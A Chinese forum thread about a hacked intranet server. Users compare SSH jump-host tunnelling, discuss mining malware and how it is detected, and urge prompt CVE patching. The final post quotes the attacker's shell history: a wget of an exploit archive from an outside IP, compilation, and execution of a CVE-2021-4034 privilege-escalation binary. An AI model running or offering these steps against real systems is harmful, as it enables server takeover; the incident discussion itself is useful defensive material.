- 主题:服务器又被黑了。。。
俺以前见过一台Linux服务器被黑变成挖矿的肉鸡,俺折腾了很久也无法把挖矿程序清除干净,最后只能格式化重装系统。
【 在 l234567890 的大作中提到: 】
: 搞高性能计算的服务器,系统基本上不动,好几年前的了
: 不过是内网,想着会安全些
:
--
FROM 101.80.202.*
不是,-J是jump host做了一个tunnel连到destination上,
然后client去连jump host上的tunnel端点,client只用
本地agent,不需要agent forwarding
【 在 JulyClyde 的大作中提到: 】
: 那就是你的-J其实还是依赖于-A啊
--
FROM 183.157.161.*
这种一般怎么发现的?
【 在 creek 的大作中提到: 】
: 俺以前见过一台Linux服务器被黑变成挖矿的肉鸡,俺折腾了很久也无法把挖矿程序清除干净,最后只能格式化重装系统。
:
--
FROM 124.64.120.*
o
【 在 adoal 的大作中提到: 】
: 不是,-J是jump host做了一个tunnel连到destination上,
: 然后client去连jump host上的tunnel端点,client只用
: 本地agent,不需要agent forwarding
: ...................
--
FROM 139.227.19.*
比如某些业务存在一些命令执行漏洞的话,比如struts的一些命令执行漏洞,也可以直接获取到服务器的shell
【 在 l234567890 的大作中提到: 】
: 如果服务器有漏洞,是不是不用key也能攻破?
: --来自微微水木3.5.14
--
FROM 42.93.249.*
提权注入嘛,论及时打CVE补丁,及限制对外业务进程运行权限的重要性。
【 在 brace 的大作中提到: 】
: 比如某些业务存在一些命令执行漏洞的话,比如struts的一些命令执行漏洞,也可以直接获取到服务器的shell
--
FROM 119.130.155.*
想不发现也难,CPU被占光,其他应用动都动不了。【汗】
【 在 nolonger 的大作中提到: 】
: 这种一般怎么发现的?
: :
--
FROM 101.80.202.*
如果碰到一个有节制的木马/病毒,就占用10%的资源,岂不是很久都发现不了了。。。
【 在 creek 的大作中提到: 】
: 想不发现也难,CPU被占光,其他应用动都动不了。【汗】
:
--
FROM 117.136.0.*
理论上有可能,实际上对肉鸡一般都是掠夺式开发。
【 在 nolonger 的大作中提到: 】
: 如果碰到一个有节制的木马/病毒,就占用10%的资源,岂不是很久都发现不了了。。。
: :
--
FROM 101.80.202.*
黑客新建了一个账户,从里面的history文件里看到了黑客的操作
sud osu
sudo su
sudo su
ls
cd
ls
sud osu
sudo su
ls
lswget 92.118.39.35/explcentos.zip
wget 92.118.39.35/explcentos.zip
unzip explcentos.zip
make
./cve-2021-4034
su system
【 在 creek 的大作中提到: 】
: 理论上有可能,实际上对肉鸡一般都是掠夺式开发。
--
FROM 218.28.195.*